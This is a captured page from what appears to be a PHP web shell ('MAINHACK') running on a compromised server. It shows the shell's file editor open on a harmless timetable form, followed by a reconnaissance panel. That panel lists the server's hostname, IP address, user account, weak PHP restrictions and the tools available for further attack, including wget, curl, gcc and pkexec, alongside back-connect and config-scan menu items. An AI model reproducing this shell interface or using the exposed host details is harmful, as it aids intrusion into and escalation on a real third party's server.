[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: tt.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Timetable</title> <style> body { font-family: Arial, sans-serif; } .timetable { width: 100%; border-collapse: collapse; margin: 20px auto; } .timetable, th, td { border: 1px solid #ddd; padding: 8px; text-align: center; } th { background-color: #f2f2f2; } select { width: 90%; padding: 5px; } input[type="submit"] { margin-top: 10px; padding: 10px 20px; background-color: #28a745; color: white; border: none; cursor: pointer; } input[type="submit"]:hover { background-color: #218838; } </style> </head> <body> <form action="save_timetable.php" method="POST"> <table class="timetable"> <tr> <th>D/T</th> <th>10 to 11</th> <th>11 to 12</th> <th>12 to 01</th> <th>01 to 02</th> <th>02 to 03</th> <th>03 to 04</th> <th>04 to 05</th> </tr> <?php $days = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday"]; foreach ($days as $day) { echo "<tr>"; echo "<td>$day</td>"; for ($i = 0; $i < 7; $i++) { echo '<td> <select name="course[]"> <option value="">Select Course</option> <option value="Cryptography">Cryptography</option> <option value="Cloud Computing">Cloud Computing</option> <option value="PPC">PPC</option> <option value="Mobile Computing">Mobile Computing</option> </select> <select name="room[]"> <option value="">Select Room</option> <option value="Room No. 1">Room No. 1</option> <option value="Room No. 2">Room No. 2</option> </select> <select name="teacher[]"> <option value="">Select Teacher</option> <option value="Zahir">Zahir</option> <option value="Kishan Kumar">Kishan Kumar</option> <option value="Ravi">Ravi</option> <option value="Vikash Dewanga">Vikash Dewanga</option> </select> </td>'; } echo "</tr>"; } ?> </table> <input type="submit" value="Save Timetable"> </form> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.07 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002